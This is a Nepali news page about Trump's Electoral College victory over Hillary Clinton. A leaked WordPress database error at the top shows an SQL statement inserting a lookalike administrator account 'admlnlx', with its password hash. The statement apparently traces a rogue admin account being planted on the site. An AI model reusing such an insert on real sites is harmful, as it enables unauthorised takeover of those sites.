WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bo3tjDjKRijom5KazowW6GU7ph9bMP1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 12:09:08', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस ५-
राष्ट्रपति चुनाव जितेका डोनाल्ड ट्रम्पलाई हृवाइट हाउस प्रवेश गर्न नदिने प्रयास असफल भएको छ । अमेरिकी इलेक्टोरल कलेजले उनलाई राष्ट्रपति निर्वाचित गरेको छ ।
चुनाव जितेको ६ सातापछि ट्रम्पले २७० इलेक्टोरल भोट पाएका छन्, जसले औपचारिक राष्ट्रपति चुनिएका छन् । ट्रम्पले देशलाई एकतावद्ध बनाएर कडा परीश्रम गर्ने प्रतिवद्धता जनाएका छन् ।
ट्रम्पलाई मत नदिन भन्दै इलेक्टोरलहरुलाई हजारौं इमेल र फोन आएको थियो । उसो त सबै राज्यका इलेक्टोरलहरुले जनमत भन्दा फरक भोट दिन सक्दैनन् । तर, केहीमा भने यो छुट थियो ।
टेक्ससका इलेक्टोरहरुले जनमत अनुसार ट्रम्पकै पक्षमा मत दिए । तर, दुई जनाले भने विपक्षमा मत हालेका छन् ।
न्यूयोर्क टाइम्सले चार डेमोक्राट इलेक्टोरले पनि हिलरी क्लिन्टनको साटो अरुलाई नै भोट दिएको दाबी गरेको छ ।